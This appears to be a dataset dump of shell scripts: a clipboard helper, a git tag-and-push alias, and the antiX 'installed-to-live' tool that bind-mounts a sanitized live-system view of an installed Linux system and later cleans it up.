echo "no args to cb"
return
fi
temp=~/Documents/cb_temp
# Single quotes defer expansion of $@ and $temp until the `eval` below,
# so the command captures the caller's arguments at evaluation time.
comm='echo -n $@ > $temp'
# If the first arg is an option containing "f", copy the named file instead.
if [[ (${1::1} == "-") && (`echo $1 | grep f`) ]]
then
dir=`pwd`
comm="cat $dir/$2 > $temp"
fi
# NOTE(review): [[ true ]] tests a non-empty string, so it is always true —
# the guard appears to exist only for structure.
if [[ true ]]
then
touch $temp
eval $comm
cd ~/Documents
# Feed the temp file into the X clipboard selection.
xsel --clipboard < $temp
rm $temp
cd - > /dev/null
fi
| true
|
72788f8d49404d3435ddd4c3950a9ff6aac4ae15
|
Shell
|
zloyded/bash_files
|
/aliases/git_aliases.sh
|
UTF-8
| 100
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# Define `pushtag` in the calling shell; this file must be *sourced*:
#   source git_aliases.sh <tag> [<message>]
TAG=$1
MESSAGE=$2

# A function instead of an alias: aliases are not expanded in
# non-interactive shells, so the old `alias pushtag=...` silently did
# nothing inside scripts, and baking $MESSAGE into a single-quoted alias
# body broke on messages containing quotes. Quoted expansions here
# survive arbitrary tag/message values.
pushtag() {
  git tag -a "$TAG" -m "$MESSAGE" && git push origin "$TAG"
}
| true
|
8ef58c883bdaa5ae9b080147f16ebd11cafe4822
|
Shell
|
antiX-Linux/Build-iso
|
/Tools/installed-to-live
|
UTF-8
| 30,046
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Start:
# 1) Bind mount the bind-root
#
# General
# 2) do a bunch of bind mounts under bind-root
# (create directories and touch files as needed)
# 3) Munge files
#
# Add:
# 4) optionally do more bind mounts under ro-root
# (create directories and touch files as needed)
# Clean:
# 5) do a recursive umount
# 6) Delete touched files and created directories from the *original* FS
# Script name (basename of $0), used in messages and default paths.
ME=${0##*/}
# Default live user / root credentials as "name:password".
USER_PW=demo:demo
ROOT_PW=root:root
# Where the bind-mounted "live view" of the filesystem is assembled.
BIND_ROOT=/.bind-root
REAL_ROOT=/
WORK_DIR=/tmp/$ME
EXCLUDES_DIR=/usr/local/share/excludes
VERSION_FILE=/etc/live/version/linuxfs.ver
CONF_FILE=$WORK_DIR/cleanup.conf
TEMPLATE_DIR=/usr/local/share/live-files
DEF_TZ="America/New_York"
DEF_REPO="us"
PRETEND=
# Account databases that get munged and bind-mounted for the live view.
PW_FILES="/etc/passwd /etc/shadow /etc/gshadow /etc/group"
MUNGE_FILES="/etc/slim.conf /etc/lightdm/lightdm.conf"
BIND_FILES="$PW_FILES"
# Files pulled from a mounted linuxfs into the "files" template.
# (Only lines starting with "/" are used by copy_files; comments are ignored.)
# FIX: removed unresolved git merge-conflict markers (<<<<<<< / ======= /
# >>>>>>>) that had been committed into this list — both sides carried the
# identical persist_setup.desktop entry, kept once below.
LIVE_FILE_LIST="
/etc/desktop-session/startup
/etc/fstab
/etc/grub.d/*
/etc/init.d/checkfs.sh
/etc/init.d/cron
/etc/init.d/debian/*
/etc/init.d/gpm
/etc/init.d/hwclock.sh
/etc/init.d/keyboard-setup.sh
/etc/init.d/console-setup.sh
/etc/init.d/sendsigs
/etc/init.d/umountfs
/etc/issue
/etc/rc.local
/etc/rc?.d/*virtualbox*
/etc/skel/.fluxbox/menu
/etc/skel/.icewm/menu
/etc/skel/.jwm/menu
/etc/skel/Desktop/Installer.desktop
/etc/udev/rules.d/90-fstab-automount.rules
/lib/udev/rules.d/92-console-font.rules
/usr/share/applications/mx/minstall.desktop
/usr/share/applications/antix/minstall.desktop
/usr/share/applications/antix/antixsources.desktop
/usr/share/applications/antix/persist-config.desktop
/usr/share/applications/antix/persist_setup.desktop
/usr/share/applications/antix/persist_save.desktop
/usr/share/applications/antix/remaster.desktop
"
# Files pulled into the "general-files" template (host-specific config).
GENERAL_LIVE_FILE_LIST="
/etc/adjtime
/etc/default/*
/etc/dhcp/dhclient.conf
/etc/dnsmasq.conf
/etc/hostname
/etc/init.d/ifplugd
/etc/init.d/networking
/etc/kbd/config
/etc/lightdm/lightdm.conf
/etc/modprobe.d/*
/etc/network/interfaces
/etc/network/interfaces.d/*
/etc/slim.conf
/lib/udev/ifupdown-hotplug
"
# Print the help text and exit with the given status (default 0).
# The heredoc expands $ME, $CONF_FILE etc., so it reflects any option
# overrides applied before usage() is called.
usage() {
    local ret=${1:-0}
    cat<<Usage
Usage: $ME [options] [commands ...]
Use bind mounts to create a filesystem that looks like the live system.
Create a config file $CONF_FILE that can be used to undo what we did.
This is needed because sometimes we create directories and touch files.
Commands:
start Do the main bind mount and create cleanup.conf
status Show status including contents of cleanup.conf
live-files bind mount files under $TEMPLATE_DIR/files
general-files bind mount files under $TEMPLATE_DIR/general-files
read-only Remount the bind root directory as read-only
read-write Remount the bind root directory as read-write
passwd Make general purpose password/group files
add=<dir1,dir2,..> Add files from the dirs template
bind=<dir1,dir2,..> Bind mount each dir IF it is a mountpoint
general Same as "empty=/etc/modprobe.d/ empty=/etc/grub.d
empty=/etc/network/interfaces.d/
all-files passwd repo timezone"
adjtime Reset the adjtime file but leave the utc / local selection
cleanup Clean up all that we did
repo[=<country>] Reset the apt repos to the country given (default us)
timezone=[<zone>] Reset the timezone back to EST or as specfied
empty=<dir1,dir2,...>
Bind mount empty directories at these locations
exclude[=<prefix>] file1 file2 ...
Generate an exclude list from the files listed. Prepend
each entry with <prefix> if it is given. (This is a
convenience routine for use with mksquashfs).
version-file[=<title>]
Create a standard linuxfs.ver file and bind mount it at
the appropriate location: $VERSION_FILE
populate-live-files <from-dir> [<to-dir>]
Populate the $TEMPLATE_DIR with files extracted from
<from-dir>. This is usually a mounted linuxfs file.
The optional <to-dir> is the top level directory under
which we will put the template directory.
Options:
-b --bind-root=<dir> The root of the new fs. Default: $BIND_ROOT
-e --excludes-dir=<dir> Directory for exclude files Default: $EXCLUDES_DIR
-f --from=<dir> Directory we copy from. Default: $REAL_ROOT
-F --Force Delete work directory when starting
-h --help Show this help
-o --output=<file> Send "exclude" command output to <file> instead of stdout
-P --pretend Don't do anything just show what would be done
-r --root=<user:password> The root user and optional password
-t --template=<dir> Template directory
-u --user=<user:password> Default username and optional password
-w --work=<dir> Temporary directory to hold our work: $WORK_DIR
-v --verbose Print more
Note: if passwords aren't given then the username is used as the password.
Current defaults:
--bind-root=$BIND_ROOT
--from=$REAL_ROOT
--template=$TEMPLATE_DIR
--user=$USER_PW
--root=$ROOT_PW
Usage
    exit $ret
}
# Parse options (long and stackable short forms), then execute each
# command argument in order. Options mutate the script-level defaults
# (BIND_ROOT, REAL_ROOT, WORK_DIR, ...).
main() {
    [ $# -eq 0 ] && usage
    local param val
    # Letters allowed in a stacked short-option group like -Fv.
    local short_stack="bdefFhoprtuv"
    while [ $# -gt 0 -a -n "$1" -a -z "${1##-*}" ]; do
        param=${1#-}
        shift
        # Unstack single-letter options: -Fv  ->  -F -v
        case $param in
            [$short_stack][$short_stack]*)
                if [ -z "${param//[$short_stack]/}" ]; then
                    set -- $(echo $param | sed -r 's/([a-zA-Z])/ -\1 /g') "$@"
                    continue
                fi;;
        esac
        # Options in this list consume the next argument as their value;
        # --opt=value forms carry the value inline instead.
        case $param in
            -bind-root|-excludes-dir|-from|-output|-root|-template|-user|-work|[befortuw])
                [ $# -lt 1 ] && fatal "Expected a parameter after: -$param"
                val=$1
                [ -n "$val" -a -z "${val##-*}" ] \
                    && fatal "Suspicious parameter after -$param: $val"
                shift ;;
            *=*) val=${param#*=} ;;
            *) val="???" ;;
        esac
        case $param in
            -bind-root=*|b=*) BIND_ROOT=$val ;;
            -bind-root|b) BIND_ROOT=$val ;;
            -excludes-dir=*|e=*) EXCLUDES_DIR=$val ;;
            -excludes-dir|e) EXCLUDES_DIR=$val ;;
            -from=*|f=*) REAL_ROOT=$val ;;
            -from|f) REAL_ROOT=$val ;;
            -Force|F) FORCE=true ;;
            -help|h) usage ;;
            -output=*|o=*) OUTPUT_FILE=$val ;;
            -output|o) OUTPUT_FILE=$val ;;
            -pretend|p) PRETEND=true ;;
            -root=*|r=*) ROOT_PW=$val ;;
            -root|r) ROOT_PW=$val ;;
            -template=*|t=*) TEMPLATE_DIR=$val ;;
            -template|t) TEMPLATE_DIR=$val ;;
            -user=*|u=*) USER_PW=$val ;;
            -user|u) USER_PW=$val ;;
            -verbose|v) VERBOSE=true ;;
            -work=*|w=*) WORK_DIR=$val ;;
            # FIX: pattern was "-work|w=)" so the short form "-w <dir>"
            # never matched and fell through to "Unknown argument: -w".
            -work|w) WORK_DIR=$val ;;
            *) fatal "Unknown argument: -$param" ;;
        esac
    done
    # WORK_DIR may have been overridden above; recompute the conf path.
    CONF_FILE=$WORK_DIR/cleanup.conf
    [ $# -eq 0 ] && fatal "Expected at least one command"
    while [ $# -gt 0 ]; do
        local val cmd=$1
        shift
        val=${cmd#*=}
        case $cmd in
            start) do_start $CONF_FILE $WORK_DIR ;;
            status) do_status $CONF_FILE ;;
            add=*) do_add $CONF_FILE $WORK_DIR "$val" ;;
            bind=*) do_bind $CONF_FILE $WORK_DIR "$val" ;;
            live-files) do_live_files $CONF_FILE $WORK_DIR ;;
            general-files) do_general_files $CONF_FILE $WORK_DIR ;;
            general) do_general $CONF_FILE $WORK_DIR ;;
            passwd) do_passwd $CONF_FILE ;;
            read-only) do_read_only $CONF_FILE ;;
            read-write) do_read_write $CONF_FILE ;;
            cleanup) do_cleanup $CONF_FILE $WORK_DIR ;;
            empty=*) do_empty $CONF_FILE $WORK_DIR "$val" ;;
            version-file) do_version_file $CONF_FILE $WORK_DIR ;;
            version-file=*) do_version_file $CONF_FILE $WORK_DIR "$val" ;;
            adjtime) do_adjtime $CONF_FILE $WORK_DIR ;;
            # exclude consumes all remaining arguments as file names.
            exclude=*) do_exclude "$val" "$@" ; exit 0 ;;
            exclude) do_exclude "" "$@" ; exit 0 ;;
            repo) do_repo $CONF_FILE $WORK_DIR "$DEF_REPO" ;;
            repo=*) do_repo $CONF_FILE $WORK_DIR "$val" ;;
            timezone) do_timezone $CONF_FILE $WORK_DIR "$DEF_TZ" ;;
            timezone=*) do_timezone $CONF_FILE $WORK_DIR "$val" ;;
            populate-live-files) do_populate_live "$@" ;;
            *) fatal "Unexpected command: $cmd."
        esac
    done
}
# Populate the live-files templates from a mounted linuxfs tree.
# $1 = source directory (required), $2 = optional destination prefix.
do_populate_live() {
    [ $# -lt 1 ] && fatal "Missing <from> directory"
    local from_dir=$1 to_dir=$2
    # FIX: error message referenced undefined $from, so it printed
    # " is not a directory" with the offending path missing.
    test -d "$from_dir" || fatal "$from_dir is not a directory"
    copy_files "$from_dir" "$LIVE_FILE_LIST" "$to_dir$TEMPLATE_DIR/files"
    copy_files "$from_dir" "$GENERAL_LIVE_FILE_LIST" "$to_dir$TEMPLATE_DIR/general-files"
    exit 0
}
# Copy the files named in $2 (a newline list; only lines starting with "/"
# count, comments stripped) from under $1 into the template tree $3.
# The template tree is recreated from scratch on every call.
copy_files() {
    local from_dir=$1 files=$2 to_dir=$3
    # Sanity guard: refuse to rm -rf an empty or letter-free path.
    [ -z "$to_dir" -o -n "${to_dir##*[a-zA-Z]*}" ] && fatal "suspicious to-dir: $to_dir"
    pretend rm -rf $to_dir
    pretend mkdir -p $to_dir
    # Strip comment lines/suffixes, keep absolute paths, prefix with from_dir.
    local list=$(echo "$files" | grep -v "^\s*#\s*" | sed 's/\s*#.*//' \
        | grep "^/" | sed "s=^=$from_dir=")
    local file
    for file in $list; do
        test -e $file || continue
        # Rebuild the same relative path under to_dir, creating parents.
        local dest_file=${file#$from_dir}
        local dest=$to_dir$dest_file
        local dest_dir=$(dirname $dest)
        test -d $dest_dir || pretend mkdir -p $dest_dir
        pretend cp -a $file $dest
    done
}
# Build a linuxfs.ver file (preserving any existing one and appending a
# new stamped record) under the work dir, then bind mount it over
# $VERSION_FILE via the template machinery.
do_version_file() {
    local conf_file=$1 work_dir=$2 title=$3
    read_conf_file $conf_file
    local vdir=$work_dir/version-file
    local vfile=$vdir$VERSION_FILE
    mkdir -p $(dirname $vfile) || fatal "Could not make directory for version-file"
    # Keep the previous version history, if any.
    test -e $VERSION_FILE && cp $VERSION_FILE $vfile
    cat >> $vfile << Version_Info
$(version_id)
title: $title
creation date: $(date +"%e %B %Y %T %Z")
kernel: $(uname -sr)
machine: $(uname -m)
Version_Info
    bind_mount_template "$vdir" "$BIND_ROOT" "$REAL_ROOT"
}
# Merge the named exclude files into one sorted, de-duplicated list on
# stdout (or $OUTPUT_FILE), optionally prefixing each entry with $1.
# Exits non-zero if any named exclude file is missing.
do_exclude() {
    local file line ecnt=0 prefix=$1
    shift
    [ "$OUTPUT_FILE" ] && exec > $OUTPUT_FILE
    # First pass: count missing files in the *current* shell.
    # FIX: the original piped its single loop into `sort -u`, so the
    # ecnt increments happened in a pipeline subshell and were lost —
    # the non-zero exit paths below were unreachable.
    for file; do
        [ -z "${file##/*}" -o -z "${file##.*}" ] || file="$EXCLUDES_DIR/$file"
        if ! test -f $file; then
            error "Exclude file $file does not exist"
            ecnt=$((ecnt + 1))
        fi
    done
    # Second pass: emit the merged list (subshell here is harmless).
    for file; do
        [ -z "${file##/*}" -o -z "${file##.*}" ] || file="$EXCLUDES_DIR/$file"
        test -f $file || continue
        # Drop comment lines/suffixes and the leading slash of each entry.
        for line in $(grep -v "^\s*#" $file | sed -r -e "s=^\s*/?==" -e 's/\s+#.*//'); do
            echo "$prefix$line"
        done
    done | sort -u
    case $ecnt in
        0) exit 0;;
        1) fatal "One missing exclude file" ;;
        *) fatal "$ecnt missing exclude files" ;;
    esac
}
# Create $BIND_ROOT, bind mount the source root onto it and write the
# initial cleanup.conf. Refuses to reuse an existing work dir or an
# already-mounted bind root unless --Force was given.
do_start() {
    local conf_file=$1 work_dir=$2
    [ -z "$FORCE" -a -e "$work_dir" ] && fatal "Work dir $work_dir exists. Use --Force to delete it"
    test -e $work_dir && rm -rf $work_dir
    mkdir -p $BIND_ROOT || fatal "Could not make bind root directory $BIND_ROOT"
    if is_mounted $BIND_ROOT &>/dev/null; then
        [ -z "$FORCE" ] && fatal "bind-root: $BIND_ROOT is already a mount point"
    else
        mount --bind $REAL_ROOT $BIND_ROOT
    fi
    write_conf_file $conf_file
}
# Remount the bind root read-only (must already be mounted).
do_read_only() {
    local conf_file=$1 work_dir=$2 dirs=$3
    read_conf_file $conf_file
    is_mounted $BIND_ROOT &>/dev/null || fatal "read-only: $BIND_ROOT is not mounted"
    mount -o remount,bind,ro $BIND_ROOT
}
# Remount the bind root read-write (must already be mounted).
do_read_write() {
    local conf_file=$1 work_dir=$2 dirs=$3
    read_conf_file $conf_file
    is_mounted $BIND_ROOT &>/dev/null || fatal "read-only: $BIND_ROOT is not mounted"
    mount -o remount,bind,rw $BIND_ROOT
}
# Bind mount the template for each comma-separated directory in $3.
# NOTE(review): the while body runs in a pipeline subshell, so fatal
# there exits only the subshell, and state changes do not propagate.
do_add() {
    local conf_file=$1 work_dir=$2 dirs=$3
    read_conf_file $conf_file
    local dir real_dir real_root=${REAL_ROOT%/}
    echo "$dirs" | tr ',' '\n' | while read dir; do
        [ "$dir" ] || continue
        real_dir=$real_root/${dir#/}
        test -d $real_dir || fatal "Add dir: $real_dir is not a directory"
        bind_mount_template "$dir" "$BIND_ROOT" "$REAL_ROOT"
    done
    write_conf_file $CONF_FILE
}
# For each comma-separated dir in $3 that is itself a mountpoint on the
# real system, repeat the bind mount under the bind root.
do_bind() {
    local conf_file=$1 work_dir=$2 dirs=$3
    read_conf_file $conf_file
    local dir real_dir real_root=${REAL_ROOT%/}
    echo "$dirs" | tr ',' '\n' | while read dir; do
        dir=${dir#/}
        [ "$dir" ] || continue
        real_dir=$real_root/$dir
        mountpoint -q $real_dir || continue
        pretend mount --bind $real_dir $BIND_ROOT/$dir
    done
    write_conf_file $CONF_FILE
}
# Hide the contents of the given directories by bind mounting empty
# directories over them.
do_empty() {
    local conf_file=$1 work_dir=$2 dirs=$3
    read_conf_file $conf_file
    bind_empty_dirs "$WORK_DIR/empty" "$BIND_ROOT" "$REAL_ROOT" "$dirs"
}
# Copy the apt source lists into the work dir, localize them for the
# given country and bind mount the result over the originals.
do_repo() {
    local conf_file=$1 work_dir=$2 country=$3
    read_conf_file $conf_file
    real_dir="/etc/apt/sources.list.d"
    repo_dir=$work_dir/repo
    copy_dir=$repo_dir$real_dir
    pretend mkdir -p $copy_dir
    pretend cp $real_dir/*.list $copy_dir
    pretend localize-repo --dir=$copy_dir $country
    bind_mount_template "$repo_dir" "$BIND_ROOT" "$REAL_ROOT"
}
#------------------------------------------------------------------------------
# Reset the live view's timezone to $3 by bind mounting replacement
# /etc/timezone (and /etc/localtime when it is a regular file).
#------------------------------------------------------------------------------
do_timezone() {
    local conf_file=$1 work_dir=$2 tz=$3
    read_conf_file $conf_file
    local zone_file=$REAL_ROOT/usr/share/zoneinfo/$tz
    local local_file=$REAL_ROOT/etc/localtime
    local tz_file=$REAL_ROOT/etc/timezone
    if ! test -e "$zone_file"; then
        error "Invalid timezone: $tz"
        return
    fi
    # NOTE(review): real_zone is (probably unintentionally) not `local`.
    real_zone=$(readlink -f "$zone_file")
    if ! test -f "$real_zone"; then
        error "Invalid zoneinfo file: $real_zone"
        return
    fi
    local orig_tz=$(cat $tz_file 2>/dev/null)
    # If the timezone is already set to what we want then do nothing
    if [ "$tz" = "$orig_tz" ]; then
        return
    fi
    local tz_dir=$work_dir/tz
    local etc_dir=$tz_dir/etc
    mkdir -p $etc_dir
    # Always bindmount the timezone file (when needed)
    echo "$tz" > $etc_dir/timezone
    # If localtime is a real file then do the bindmount trick
    # (a symlinked localtime cannot be bind mounted over; it is left alone).
    if ! test -L $local_file; then
        cp $local_file $etc_dir/localtime
    fi
    bind_mount_template "$tz_dir" "$BIND_ROOT" "$REAL_ROOT"
}
# Report whether a session was started, the bind root's mount state and
# the contents of cleanup.conf. Always exits.
do_status() {
    local conf_file=$1
    echo "$ME status:"
    if ! read_conf_file $conf_file force; then
        echo " unstarted"
        exit 0
    fi
    echo " started"
    if ! test -d $BIND_ROOT; then
        echo " BIND_ROOT: $BIND_ROOT is not a directory"
    elif is_mounted $BIND_ROOT; then
        echo " BIND_ROOT: $BIND_ROOT is mounted"
    else
        echo " BIND_ROOT: $BIND_ROOT is not mounted"
    fi
    echo
    echo " Config file:"
    echo ">>>>>>>>>>"
    cat $conf_file
    echo "<<<<<<<<<<"
    [ "$VERBOSE" ] || exit 0
    echo
    # Verbose extra: list every mount under the bind root.
    echo ">> df -a | grep $BIND_ROOT | awk '{print \$6}'"
    df -a | grep $BIND_ROOT | awk '{print $6}'
    exit 0
}
# Neutralize the clock-drift record in /etc/adjtime while keeping the
# third line's UTC/LOCAL selection intact.
do_adjtime() {
    local conf_file=$1 work_dir=$2
    read_conf_file $conf_file
    local orig_file=/etc/adjtime
    test -r $orig_file || return 0
    local template_dir=$work_dir/adjtime
    local targ_file=$template_dir$orig_file
    mkdir -p $(dirname $targ_file)
    cp $orig_file $targ_file
    # Zero the drift (line 1) and last-adjustment time (line 2) only.
    sed -i -e "1 s/.*/0.0 0 0.0/" -e "2 s/.*/0/" $targ_file
    bind_mount_template "$template_dir" "$BIND_ROOT" "$REAL_ROOT"
}
# Build munged password/group files and bind mount them into the live view.
do_passwd() {
    local conf_file=$1
    read_conf_file $conf_file
    munge_files "$TEMPLATE_DIR" "$BIND_ROOT" "$WORK_DIR" "$USER_PW" "$ROOT_PW"
    write_conf_file $CONF_FILE
}
# Apply the "files" template (live-specific replacement files).
do_live_files() {
    local conf_file=$1 work_dir=$2
    _do_files $conf_file $work_dir $TEMPLATE_DIR/files $work_dir/live-files
}
# Apply the "general-files" template (host-specific config resets).
do_general_files() {
    local conf_file=$1 work_dir=$2
    _do_files $conf_file $work_dir $TEMPLATE_DIR/general-files $work_dir/general-files
}
# Shared worker: copy a template tree into the work dir and bind mount
# every file in it over the bind root.
_do_files() {
    local conf_file=$1 work_dir=$2 from=$3 temp=$4
    read_conf_file $conf_file
    test -d $from || fatal "Directory $from does not exist"
    mkdir -p $temp || fatal "Could not mkdir -p $temp"
    # Errors silenced: an empty template directory is acceptable.
    cp -r $from/* $temp/ 2>/dev/null
    bind_mount_template "$temp" "$BIND_ROOT" "$REAL_ROOT"
    write_conf_file $CONF_FILE
}
# Apply both template trees.
do_all_files() {
    do_live_files "$@"
    do_general_files "$@"
}
#------------------------------------------------------------------------------
# This is a catch-all for doing the normal things we usually want to do.  As
# more nooks and crannies are discovered they are usually added here and the
# callers don't have to change anything.
#------------------------------------------------------------------------------
do_general() {
    local conf_file=$1 work_dir=$2
    do_empty $conf_file $work_dir "/etc/modprobe.d"
    do_empty $conf_file $work_dir "/etc/grub.d"
    do_empty $conf_file $work_dir "/etc/network/interfaces.d"
    do_all_files $conf_file $work_dir
    do_passwd $conf_file
    do_repo $conf_file $work_dir $DEF_REPO
    do_timezone $conf_file $work_dir $DEF_TZ
    write_conf_file $conf_file
}
#------------------------------------------------------------------------------
# Try to put the system back into the same state it was in before we started:
# recursively unmount the bind root, then delete the files/dirs we created on
# the *real* filesystem (recorded in cleanup.conf), then remove the work dir.
#------------------------------------------------------------------------------
do_cleanup() {
    local conf_file=$1 work_dir=$2
    read_conf_file $conf_file $FORCE
    is_mounted $BIND_ROOT &>/dev/null && pretend umount --recursive $BIND_ROOT
    # We MUST umount before we remove files and directories because otherwise
    # we would be trying to remove mountpoints which the system does not like
    # the recursive umount may be imperfect but we only need a few iterations
    # to get it all umounted.
    local i
    for i in $(seq 1 10); do
        is_mounted $BIND_ROOT &>/dev/null || break
        pretend umount --recursive $BIND_ROOT
        [ "$PRETEND" ] && break
        sleep 0.1
    done
    # FIX: the failure message referenced undefined $BIND_DIR and so printed
    # "Could not umount " with no path; use $BIND_ROOT.
    [ -z "$PRETEND" ] && is_mounted $BIND_ROOT &>/dev/null && fatal "Could not umount $BIND_ROOT"
    test -d $BIND_ROOT && pretend rmdir $BIND_ROOT
    # Remove files that we touched on the root file system
    # (reverse order, so children are handled before their parents).
    local file dir
    echo "$RM_FILES" | tr ',' '\n' | tac | while read file; do
        [ "$file" ] || continue
        pretend rm -f "$file"
    done
    # removed directories we created on the root file system
    echo "$RM_DIRS" | tr ',' '\n' | tac | while read dir; do
        [ "$dir" ] || continue
        pretend rmdir --ignore-fail-on-non-empty --parents "$dir"
    done
    # Finally, clean up our working directory
    pretend rm -f $conf_file
    [ "$work_dir" ] && pretend rm -rf $work_dir
    exit 0
}
#------------------------------------------------------------------------------
# This is a central routine.  We bind mount every file that is in the template
# directory to the equivalent location under the bind root.  We may have to
# make directories and touch files to do this so in those cases we record the
# location of the created file or directory on the real file system so we can
# clean them up after we are done and after the bind root was unmounted.
#------------------------------------------------------------------------------
bind_mount_template() {
    local template_dir=${1%/} bind_root=${2%/} real_root=${3%/}
    test -d $template_dir || return
    local file
    while read file; do
        # base = path relative to the template; targ/orig = same path under
        # the bind root and the real root respectively.
        local base=${file#$template_dir}
        local targ=$bind_root$base
        local orig=$real_root$base
        if test -L "$file"; then
            # Symlinks -- can't bind mount them
            # don't do anything if the orig already exists
            test -e "$orig" && continue
            # Otherwise, copy our symlimk to the real file system ...
            pretend cp -a "$file" "$orig"
            [ "$PRETEND" ] && continue
            # Don't add broken links
            if test -e $(readlink -f "$orig"); then
                # .. and either delete it when we are done
                RM_FILES="$RM_FILES${RM_FILES:+,}$orig"
            else
                # ... or delete it now if it is broken
                pretend rm -f "$orig"
            fi
        else
            # Can't bind mount to a symlink
            if test -L "$orig"; then
                error "Won't bind mount symlink: $orig"
                continue
            fi
            # Normal files -- bind mount template file, mkdir and touch if needed
            touch_file "$targ" "$orig"
            is_mounted "$targ" && error "File $targ is already mounted"
            pretend mount --bind "$file" "$targ"
        fi
    # Heredoc feed keeps the loop in the current shell so RM_FILES updates
    # survive (a `find | while` pipeline would lose them in a subshell).
    done <<Bind_Template
$(find $template_dir -type f -o -type l)
Bind_Template
}
#------------------------------------------------------------------------------
# "Clear out" existing directories by bind mounting an empty directory over
# them.  We have to create a different empty directory for each directory we
# want to clear in case we want to populate some of the empty directories
# with files.
#------------------------------------------------------------------------------
bind_empty_dirs() {
    local template_dir=${1%/} bind_root=${2%/} real_root=${3%/} dirs=$4
    local base
    echo "$dirs" | tr ',' '\n' | tac | while read base; do
        [ "$base" ] || continue
        local targ=$bind_root/$base
        # If directory doesn't exist then skip it
        test -d "$targ" || continue
        make_dir "$targ" "$real_root/$base"
        pretend mkdir -p "$template_dir/$base"
        pretend mount --bind "$template_dir/$base" "$targ"
    done
}
#------------------------------------------------------------------------------
# If a directory we need doesn't exist then create it and mark the *original*
# (under the real root) to be removed when we are done.  We need to remove the
# original because the bind root will already be unmounted.  Only mark the
# original for deletion if it doesn't already exist.
#------------------------------------------------------------------------------
make_dir() {
    local dir=$1 orig=$2
    test -d "$dir" && return
    test -d "$orig" || RM_DIRS="$RM_DIRS${RM_DIRS:+,}$orig"
    pretend mkdir -p "$dir"
}
#------------------------------------------------------------------------------
# If a file doesn't exist then touch it so we can bind mount a template file
# over it.  Mark the original (under the real root) for deletion if it doesn't
# already exist.
#------------------------------------------------------------------------------
touch_file() {
    local file=$1 orig=$2
    local dir=$(dirname $file)
    make_dir "$dir" "$(dirname $orig)"
    test -f $file && return
    # Something exists at the path but is not a plain file: refuse.
    test -e $file && fatal "Expected a plain file at $orig"
    test -e "$orig" || RM_FILES="$RM_FILES${RM_FILES:+,}$orig"
    pretend touch $file
}
#------------------------------------------------------------------------------
# Build sanitized copies of the passwd/shadow/group files under the work dir
# (single live user with uid 1000, known passwords, other normal users
# removed) and bind mount them over the originals in the bind root.
# Order matters throughout: the uid-1000 user must exist before the copies
# are made and be removed from the *real* files afterwards.
#------------------------------------------------------------------------------
munge_files() {
    local template_dir=$1 bind_root=$2 work_dir=$3 user_pw=${4:-demo} root_pw=${5:-root}
    local bind_from=$work_dir/bind
    local def_user=${user_pw%%:*}
    local empty_dir=$work_dir/empty
    mkdir -p $empty_dir
    # create lists of pw_files and grp_files that actually exist
    local file pw_files grp_files
    for file in $PW_FILES; do
        test -e $bind_root$file || continue
        pw_files="$pw_files $bind_from$file"
        case $file in
            */group|*/gshadow) grp_files="$grp_files $bind_from$file";;
        esac
    done
    # Ensure we have a user with uid=1000 in the real system
    local added_user
    local user_1000=$(cut -d: -f1,3 /etc/passwd | grep :1000$ | cut -d: -f1)
    if [ -z "$user_1000" ]; then
        # Don't assume there is no demo user but still try it first
        user_1000=$def_user
        while grep -q "^$user_1000:" /etc/passwd; do
            # Collide-proof throwaway name: "a" + 9 random hex chars.
            user_1000=a$(dd if=/dev/urandom bs=1 count=40 2>/dev/null | md5sum | cut -c 1-9)
        done
        adduser --disabled-login --uid=1000 --no-create-home --gecos $def_user $user_1000
        added_user=true
    fi
    # Copy in files to the bind_from *after* we've added user_1000 (if needed)
    # Use files from template_dir first if they are available.
    # NOTE(review): `live_files` is declared but never used below.
    local live_files
    for file in $BIND_FILES; do
        test -e $bind_root$file || continue
        dir=$(dirname $file)
        bdir=$bind_from$dir
        # Don't munge files that have a template file
        [ "$template_dir" -a -e $template_dir$file ] && continue
        pretend mkdir -p $bdir
        # Probably makes no difference that we copy from bind_root, not real_root
        pretend cp -a $bind_root$file $bdir
    done
    # Remove the added user from the originals (but it is still in the copies
    # under bind_from/)
    [ "$added_user" ] && deluser $user_1000
    # Modify files (under bind_from/)
    # Remove all other normal users from the passwd and group files
    # Normal means having a home dir under /home and a login shell that ends in "sh"
    local other_users=$(cut /etc/passwd -d: -f1,6,7 | grep ":/home/.*:.*sh$" | cut -d: -f1 \
        | grep -v "^$user_1000$")
    local other_user_regex=$(echo $other_users | tr " " '|')
    pretend sed -i -r "/^($other_user_regex):/d" $pw_files
    pretend sed -i -r -e "s/:($other_user_regex)(,|$)/:/" -e "s/,($other_user_regex)(,|$)/\2/" $grp_files
    # Replace user_1000 with def_user (demo) if needed
    if [ $user_1000 != $def_user ]; then
        pretend sed -i -r "s/^$user_1000:/$def_user:/" $pw_files
        pretend sed -i -r -e "s/:$user_1000(,|$)/:$def_user/" -e "s/,$user_1000(,|$)/,$def_user\1/" $grp_files
    fi
    update_home $def_user /home/$def_user $bind_from
    set_password $user_pw $bind_from
    set_password $root_pw $bind_from
    # Bind mount files under $bind_from/
    for file in $BIND_FILES; do
        local from=$bind_from$file
        local to=$bind_root$file
        test -e $from || continue
        is_mounted $to && error "File $to is already mounted"
        pretend mount --bind $from $to
    done
}
# Note: this code is no longer called/used.  We use fresh copies which
# a lot of problems.  Although we will need to call it if the name of
# the default user changes.
# Dead code: the leading `exit 10` guarantees nothing below it runs.
# NOTE(review): it also references $bind_from/$def_user, which are locals
# of munge_files and would be undefined here.
do_xorg_login() {
    exit 10
    do_sed $bind_from/etc/slim.conf \
        -e "s/^(\s#)*(default_user +).*/\2$def_user/" \
        -e "/xserver_arguments/ s/ -dpi\s+[0-9]+//" \
        -e "s/^(\s#)*(auto_login +).*/\2yes/"
    do_sed $bind_from/etc/lightdm/lightdm.conf \
        -e "/autologin-user=demo/ s/^#+//" \
        -e "/xserver-command/ s/ -dpi [0-9]+//"
}
# Run sed -i -r on $1 with the remaining args; in pretend mode, instead
# print what each expression would match.
# NOTE(review): relies on $bind_from/$real_root from the caller's scope —
# only meaningful when invoked from munge_files-style code (currently only
# the dead do_xorg_login above).
do_sed() {
    local file=$1
    shift
    echo sed $* $file
    if [ "$PRETEND" ]; then
        local expr
        file=${file/$bind_from/$real_root}
        test -e $file || return
        for expr; do
            [ "$expr" = -e ] && continue
            echo sed -n -r "${expr}" $file
            sed -n -r "${expr}p" $file
        done
    else
        test -e $file || return
        pretend sed -i -r "$@" $file
    fi
}
